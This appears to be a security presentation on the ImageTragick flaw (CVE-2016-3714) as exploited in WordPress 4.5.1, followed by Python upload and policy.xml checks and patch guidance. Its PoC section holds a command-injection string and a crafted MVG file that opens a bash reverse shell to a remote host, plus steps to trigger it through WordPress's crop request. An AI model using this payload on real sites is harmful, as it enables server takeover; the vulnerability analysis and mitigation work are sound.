Remote Code Execute Wordpress 4.5.1
AUTHOR: SINA YEGANEH
EMAIL: SINAAA.YEAGNEH@GMAIL.COM
ImageMagick
- Imagick is a native PHP extension to create and modify images using the ImageMagick API.
- ImageMagick is a software suite to create, edit, and compose bitmap images. It can read, convert and write images in a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF, PhotoCD, PNG, PostScript, SVG, and TIFF.
ImageMagick Vulnerability Information
- A few days ago an ImageMagick vulnerability was disclosed: CVE-2016-3714.
- The vulnerable path is the ReadImage function in MagickCore/constitute.c: when the image address begins with https://, it calls InvokeDelegate.
Exploit ImageMagick
- One of the default delegate commands uses the following to handle HTTPS requests:
  "wget" -q -O "%o" "https:%M"
- where %M is the actual link from the input. It is possible to pass a value like:
  example.com"|ls "-la
How is WordPress affected?
- WordPress selects a library for editing images; its image processing uses the Imagick library by default.
- If WordPress selects the Imagick library, it loads it.
- The get_attached_file function, called from within wp_crop_image, hands the file to that library, which invokes the system (delegate) command mentioned above.
PoC
- Upload a normal image in a standard image format.
- Log in to an account with Author permissions, publish an article, and insert the media.
PoC
Create the exploit.png file:
  push graphic-context
  viewbox 0 0 640 480
  fill 'url (https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")'
  pop graphic-context
Upload exploit.png and add it to the post.
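The file above is a text MVG script that is accepted only because it carries a .png name; ImageMagick identifies MVG by content, not by extension. As an added defensive example, not code from the presentation or from WordPress, here is a Python check that an upload handler can run before handing a file to Imagick: it rejects files whose bytes do not match the format their extension claims and files that begin with script markers. The format table, the marker list and the two sample inputs are constructed for this example.

```python
"""Added example (not part of the presentation): reject uploads whose bytes do
not match the image format their extension claims, before ImageMagick sees them.
ImageMagick detects MVG/SVG/MSL by content, so a text file named exploit.png is
still parsed as MVG; checking the magic bytes ourselves closes that gap."""
import os

# Magic-byte signatures for the raster formats we are willing to accept.
MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}

# Text markers that mean "this is an MVG/MSL/SVG script, not a raster image".
SCRIPT_MARKERS = (b"push graphic-context", b"<svg", b"<?xml", b"<msl>")


def classify_upload(filename: str, data: bytes) -> str:
    """Return 'ok', 'unknown_extension', 'magic_mismatch' or 'script_content'."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return "unknown_extension"
    # Only the first bytes matter: a script container announces itself early.
    head = data[:512].lstrip().lower()
    if any(marker in head for marker in SCRIPT_MARKERS):
        return "script_content"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return "magic_mismatch"
    return "ok"


def is_safe_to_process(filename: str, data: bytes) -> bool:
    """Gate used by the upload handler before calling the image library."""
    return classify_upload(filename, data) == "ok"


# Constructed samples: a minimal PNG header, and a harmless MVG script (the same
# container format the PoC abuses, without any command) renamed to .png.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_MVG_AS_PNG = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/image.jpg)'\n"
    b"pop graphic-context\n"
)

if __name__ == "__main__":
    print(classify_upload("photo.png", SAMPLE_PNG))           # ok
    print(classify_upload("exploit.png", SAMPLE_MVG_AS_PNG))  # script_content
    print(classify_upload("notes.txt", b"hello"))             # unknown_extension
    print(classify_upload("photo.jpg", SAMPLE_PNG))           # magic_mismatch
```

This check is defence in depth for the upload path only; the policy.xml restriction described later in the deck is the fix that stops ImageMagick from running the delegate at all, whatever file reaches it.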
PoC
- Click on our normal picture, select Edit, then Edit Original.
- Rotate or crop the image, then use 'Copy as cURL' on the request that was invoked.
- Then click the broken image, choose Edit and Edit Original, check the requests listed in the Network tab and find admin-ajax.php; look at the requests of type 'post' and copy the _ajax_nonce and postid parameters.
- Paste the new parameters from the broken image into the curl command copied before.
- Proof of concept by getting a connect back (change the bash command as you wish).
How do I know if my site is vulnerable?
- Inspect the output of the phpinfo() function for "Imagick".
- Run php -m | grep imagick on the command line.
How do I patch the vulnerability?
Currently the best known fix is to add a policy.xml file to your ImageMagick
installation to limit the delegates that ImageMagick will use. Due to the ongoing
nature of this issue, we recommend you refer to and follow
https://imagetragick.com/ for instructions on how to handle the problem.
Documentation on the policy.xml file can be found at
https://www.imagemagick.org/script/resources.php.
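As an added example that is not part of the presentation or of ImageMagick's own tooling, the following Python check reads a policy.xml and reports which of the coders named at imagetragick.com (EPHEMERAL, URL, HTTPS, MVG, MSL) are not yet disabled with rights="none". The two policy documents embedded in it are constructed samples: one carrying the mitigation and one that omits most of it.

```python
"""Added example (not part of the presentation or of ImageMagick): verify that a
policy.xml disables the coders involved in CVE-2016-3714. The coder list is the
one published at imagetragick.com; both sample policies below are constructed."""
import xml.etree.ElementTree as ET

REQUIRED_DISABLED = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}


def disabled_coders(policy_xml: str) -> set:
    """Return the coder patterns to which the policy grants rights="none"."""
    root = ET.fromstring(policy_xml)
    return {
        p.get("pattern", "").upper()
        for p in root.iter("policy")
        if p.get("domain") == "coder"
        and p.get("rights", "").strip().lower() == "none"
    }


def missing_coder_policies(policy_xml: str) -> set:
    """Coders from the ImageTragick list that the policy does not disable."""
    return REQUIRED_DISABLED - disabled_coders(policy_xml)


def check_policy_file(path: str) -> set:
    """Same check against an installed policy.xml, e.g. /etc/ImageMagick-6/policy.xml."""
    with open(path, encoding="utf-8") as fh:
        return missing_coder_policies(fh.read())


# Constructed sample: the mitigation as a complete policymap.
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
"""

# Constructed sample: a policy that mostly limits resources, as a default install might.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
</policymap>
"""

if __name__ == "__main__":
    print(sorted(missing_coder_policies(HARDENED_POLICY)))  # []
    print(sorted(missing_coder_policies(WEAK_POLICY)))      # ['HTTPS', 'MSL', 'MVG', 'URL']
```

Confirm which policy ImageMagick actually loaded with convert -list policy; the check above only recognises explicit per-coder entries, so a policy that relies on a wildcard pattern needs a different rule.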
References:
- http://www.imagemagick.org/
- https://make.wordpress.org/core/2016/05/06/imagemagick-vulnerability-information/
- https://access.redhat.com/security/vulnerabilities/2296071
- http://www.secpulse.com/archives/45802.html
End
